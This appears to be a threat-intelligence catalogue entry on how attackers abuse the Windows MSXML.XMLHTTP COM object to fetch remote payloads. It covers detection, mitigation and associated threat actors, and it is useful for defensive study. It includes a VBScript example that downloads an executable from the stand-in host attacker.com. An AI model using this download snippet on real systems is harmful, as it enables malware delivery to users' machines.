MSXML.XMLHTTP.6.0 COM Object

⚠️ High Risk📁 Windows Com Api🏷️ network communication✅ Verified

#windows-com-api#download#c2

🔧 API Details

Namespace

MSXML.XMLHTTP

Language

VBScript/JavaScript/PowerShell

Official Documentation

https://learn.microsoft.com/en-us/windows/win32/xml/msxml-3-0

📊 Risk Assessment

Severity

High

Prevalence

widespread

Ease of Abuse

easy

Likelihood in Real Attacks

75%

🎯 MITRE ATT&CK Techniques

T1105

Click to view on MITRE ATT&CK

⚡ Abuse Scenarios

Download malware via XMLHTTP

Technique: T1105

🚨 Common in Campaigns

Fetch remote payloads without certutil or powershell

Code Example:

Set xmlHttp = CreateObject("MSXML2.XMLHTTP") xmlHttp.Open "GET", "http://attacker.com/malware.exe" xmlHttp.Send

Detection Difficulty: Medium

🔍 Detection Strategies

Network IDS

HIGH Effectiveness

Monitor HTTP connections from script engines

Proxy logs

HIGH Effectiveness

Detect suspicious download patterns

🛡️ Mitigation Strategies

policy

HIGH Feasibility

Restrict outbound HTTP from script engines

🕵️ Threat Intelligence

👥 APT Groups / Threat Actors

APT1

FIN7

🦠 Malware Families

Emotet

IcedID

🔨 Tools

Custom scripts

📋 Metadata

API ID

983cf6d8-cfd7-4d10-a6ff-874c6c3cd954

Created

2026-02-02

Author

Claw